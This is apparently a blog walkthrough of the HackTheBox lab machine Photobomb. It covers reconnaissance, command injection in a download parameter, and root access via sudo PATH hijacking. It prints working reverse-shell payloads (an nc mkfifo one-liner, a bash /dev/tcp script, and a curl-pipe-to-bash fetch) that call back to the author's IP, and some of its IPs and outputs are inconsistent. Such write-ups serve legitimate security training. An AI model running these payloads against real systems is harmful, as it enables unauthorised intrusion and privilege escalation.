Photobomb

#Linux #Enumeration #Command-Injection #SUDO-Exploit #Path-Hijacking

Photomomb is an easy-rated Linux machine from HackTheBox, created by slartibartfast. In the current post, my IP is 10.10.14.56, and the target IP is 10.129.228.60

Recon

The first steps are about getting basic information about the target, by using nmap and searching information from the website.

Local Terminal

$ ping -c 1 10.129.228.60

Pinging 10.129.228.60 with 32 bytes of data:
Reply from 10.129.228.60: bytes=32 time=197ms TTL=63
Reply from 10.129.228.60: bytes=32 time=194ms TTL=63
Reply from 10.129.228.60: bytes=32 time=197ms TTL=63
Reply from 10.129.228.60: bytes=32 time=185ms TTL=63

Ping statistics for 10.129.228.60:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 185ms, Maximum = 197ms, Average = 193ms

By the TTL, we can assume that is a Linux Machine.

Local Terminal

$ nmap -p- --open -sS --min-rate 5000 -vvv -n 10.129.228.60 -oN Ports

Nmap scan report for 10.129.228.60
Host is up, received echo-reply ttl 63 (0.23s latency).
Scanned at 2023-06-08 11:19:12 Pacific SA Standard Time for 17s
Not shown: 65436 closed tcp ports (reset), 97 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack ttl 63
80/tcp open  http    syn-ack ttl 63

Read data files from: C:\Program Files (x86)\Nmap
Nmap done: 1 IP address (1 host up) scanned in 17.16 seconds
           Raw packets sent: 80781 (3.554MB) | Rcvd: 78472 (3.139MB)

Local Terminal

$ nmap -sCV -p 22,80,33060 10.129.167.56 -oN Target

Starting Nmap 7.92 ( https://nmap.org ) at 2023-06-08 11:19 Pacific SA Standard Time
Nmap scan report for 10.129.228.60
Host is up (0.18s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 e2:24:73:bb:fb:df:5c:b5:20:b6:68:76:74:8a:b5:8d (RSA)
|   256 04:e3:ac:6e:18:4e:1b:7e:ff:ac:4f:e3:9d:d2:1b:ae (ECDSA)
|_  256 20:e0:5d:8c:ba:71:f0:8c:3a:18:19:f2:40:11:d2:9e (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://photobomb.htb/
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.27 seconds

If you search for "OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 launchpad", you can find the specific machine type, in this case the result was: "Ubuntu Focal". It could be useful to find an vulnerability for a certain version.

Information that we have now: It's a website (port 80) that use nginx/1.18.0,

Because of the following message "Did not follow redirect to http://photobomb.htb/" we have to add the IP to /etc/hosts/

Local Terminal

$ whatweb photobomb.htb

http://photobomb.htb [200 OK] Country[RESERVED][ZZ], HTML5, 
HTTPServer[Ubuntu Linux][nginx/1.18.0 (Ubuntu)], IP[10.129.228.60], Script, 
Title[Photobomb], UncommonHeaders[x-content-type-options], X-Frame-Options[SAMEORIGIN],
 X-XSS-Protection[1; mode=block], nginx[1.18.0]

Nothing unusual.

• Browser > http://photobomb.htb/

view:source, there is an interesting JavaScript URL.

• Browser > http://photobomb.htb/photobomb.js

URL with possible credentials, using the structure http://user:pass@url pH0t0:b0Mb!

• Browser > http://photobomb.htb/printer

Login, you can see that there are a lot of images, download one with the "downloader" bellow and analyze with exiftool,

Local Terminal

$ exiftool image.jpg
ExifTool Version Number         : 12.40
File Name                       : image.jpg
Directory                       : .
File Size                       : 267 KiB
File Modification Date/Time     : 2023:06:08 11:57:20-04:00
File Access Date/Time           : 2023:06:08 11:57:47-04:00
File Inode Change Date/Time     : 2023:06:08 11:57:46-04:00
<...>

Nothing here,

Reverse Shell [wizard]

let's intercept with Burpsuite the download process.

Here we can find 3 parameters, maybe it's using a command from a shell, to test if it's vulnerable to a Command Injection you can simply add ;sleep+5 at the end.

At it fails at photo, but works at filetype.

It took 5 seconds to respond, works!

Here we can test if it's possible to the target to connect with our machine, using netcat.

https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheetpentestmonkey.net

Local Terminal

$ nc -nlvp 443

;rm+/tmp/f;mkfifo+/tmp/f;cat+/tmp/f|/bin/sh+-i+2>%261|nc+10.10.14.56+443+>/tmp/f

Request content, with the previous payload

And your local terminal is [www-data]

Alternative

But, what if the target machine doesn't have netcat installed? First, you can test the connection by using curl with an http.server

Local Terminal

$ python3 -m http.server 80

Request Payload

;curl+10.129.228.60

If the http.server receive a response, you can do the following to connect:

1. Create a file with vi index.html

#!/bin/bash

bash -i /dev/tcp/10.10.14.56/443 0>&1

1. Open an http.server

Local Terminal

$ python3 -m http.server 80

1. Send a requet with the following payload

Request Payload

;curl+10.129.228.60|bash

Privileges Escalation

Once inside the machine, do a Bash Upgrade before anything.

Target Terminal [Wizard]

wizard@photobomb:~/photobomb$ cat /home/wizard/user.txt
ad0f6c79c2897bd42cfb3be6cc74878e

Target Terminal [Wizard]

wizard@photobomb:~/photobomb$ id
uid=1000(wizard) gid=1000(wizard) groups=1000(wizard)

wizard@photobomb:~/photobomb$ sudo -l
Matching Defaults entries for wizard on photobomb:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User wizard may run the following commands on photobomb:
    (root) SETENV: NOPASSWD: /opt/cleanup.sh

There is a custom sudo file there, let's see what's inside with cat /opt/cleanup.sh

Target Terminal [Wizard]

#!/bin/bash
. /opt/.bashrc
cd /home/wizard/photobomb

# clean up log files
if [ -s log/photobomb.log ] && ! [ -L log/photobomb.log ]
then
  /bin/cat log/photobomb.log > log/photobomb.log.old
  /usr/bin/truncate -s0 log/photobomb.log
fi

# protect the priceless originals
find source_images -type f -name '*.jpg' -exec chown root:root {} \;

In Linux, the sign [ is a command, you can see with which [ if exist.

Well, here that command and find are called in a relative way, this means that we can change the path to execute another command

Target Terminal [Wizard]

$ cd /tmp

$ nano find

find

bash -p

Target Terminal [Wizard]

chmod +x find

And now we change the path of the command, remember that thanks to SETENV we can change the environment.

Target Terminal [Wizard]

sudo PATH=/tmp:$PATH /opt/cleanup.sh

Target Terminal [Root]

$ cat /root/root.txt
5e34e0049aa430f82876322e4ef75676